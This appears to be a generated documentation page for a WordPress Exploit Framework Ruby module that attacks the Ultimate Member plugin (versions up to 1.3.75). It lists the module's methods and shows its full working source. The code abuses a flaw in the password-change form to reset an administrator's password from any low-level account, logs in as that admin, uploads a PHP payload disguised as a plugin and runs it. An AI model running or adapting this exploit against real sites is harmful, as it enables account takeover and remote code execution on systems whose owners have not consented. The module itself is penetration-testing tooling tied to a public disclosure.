Class: Wpxf::Exploit::UltimateMemberShellUpload
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login, WordPress::Plugin
- Defined in:
- lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #admin_user_id ⇒ Object
- #admin_username ⇒ Object
- #before_upload ⇒ Object
- #check ⇒ Object
- #execute_password_change ⇒ Object
- #execute_payload ⇒ Object
-
#initialize ⇒ UltimateMemberShellUpload
constructor
A new instance of UltimateMemberShellUpload.
- #new_password ⇒ Object
- #password_form_url ⇒ Object
- #requires_authentication ⇒ Object
- #run ⇒ Object
- #upload_payload ⇒ Object
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ UltimateMemberShellUpload
Returns a new instance of UltimateMemberShellUpload.
9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 9 def initialize super update_info( name: 'Ultimate Member <= 1.3.75 Shell Upload', desc: 'This module exploits a vulnerability that allows users of any level to change '\ 'the password of any user. The module requires you login with an account of any '\ 'level, which will then be used to change the specified admin users\' password. '\ 'The compromised admin account will then be used to store and execute the payload.', author: [ 'James Golovich', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8688'], ['URL', 'https://ultimatemember.com/security-release-v1-3-76/'] ], date: 'Dec 08 2016' ) ([ StringOption.new( name: 'password_form_path', desc: 'The path of the change password form (default is /account/password/)', required: true ), IntegerOption.new( name: 'admin_user_id', desc: 'The ID of the user to hijack the account of', required: true ), StringOption.new( name: 'admin_username', desc: 'The username of the admin user to hijack the account of', required: true ) ]) end |
Instance Method Details
#admin_user_id ⇒ Object
60 61 62 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 60 def admin_user_id normalized_option_value('admin_user_id') end |
#admin_username ⇒ Object
64 65 66 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 64 def admin_username normalized_option_value('admin_username') end |
#before_upload ⇒ Object
90 91 92 93 94 95 96 97 98 99 100 101 102 103 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 90 def before_upload emit_info "Changing password for #{admin_username} to #{new_password}" res = execute_password_change unless res.code == 302 emit_error "Password change returned status #{res.code}", true emit_error "Failed to change the password for #{admin_username}" return false end @admin_cookie = authenticate_with_wordpress(admin_username, @new_password) return true if @admin_cookie false end |
#check ⇒ Object
48 49 50 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 48 def check check_plugin_version_from_readme('ultimate-member', '1.3.76') end |
#execute_password_change ⇒ Object
76 77 78 79 80 81 82 83 84 85 86 87 88 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 76 def execute_password_change execute_post_request( url: password_form_url, cookie: , body: { '_um_password_change' => '1', 'timestamp' => Utility::Text.rand_numeric(3), 'user_password' => new_password, 'confirm_user_password' => new_password, 'user_id' => admin_user_id } ) end |
#execute_payload ⇒ Object
115 116 117 118 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 115 def execute_payload res = execute_get_request(url: @payload_url) emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty? end |
#new_password ⇒ Object
68 69 70 71 72 73 74 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 68 def new_password @new_password || @new_password = Utility::Text.rand_alphanumeric(3) + Utility::Text.rand_alpha(1, :lower) + Utility::Text.rand_numeric(2) + Utility::Text.rand_alpha(1, :upper) + Utility::Text.rand_alphanumeric(3) end |
#password_form_url ⇒ Object
56 57 58 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 56 def password_form_url normalize_uri(full_uri, datastore['password_form_path']) end |
#requires_authentication ⇒ Object
52 53 54 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 52 def requires_authentication true end |
#run ⇒ Object
120 121 122 123 124 125 126 127 128 129 130 131 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 120 def run return false unless super return false unless before_upload emit_info 'Uploading payload...' upload_payload emit_info "Executing the payload at #{@payload_url}..." execute_payload true end |
#upload_payload ⇒ Object
105 106 107 108 109 110 111 112 113 |
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 105 def upload_payload plugin_name = Utility::Text.rand_alpha(10) payload_name = Utility::Text.rand_alpha(10) @payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") return true if upload_payload_as_plugin(plugin_name, payload_name, @admin_cookie) emit_error 'Failed to upload the payload' false end |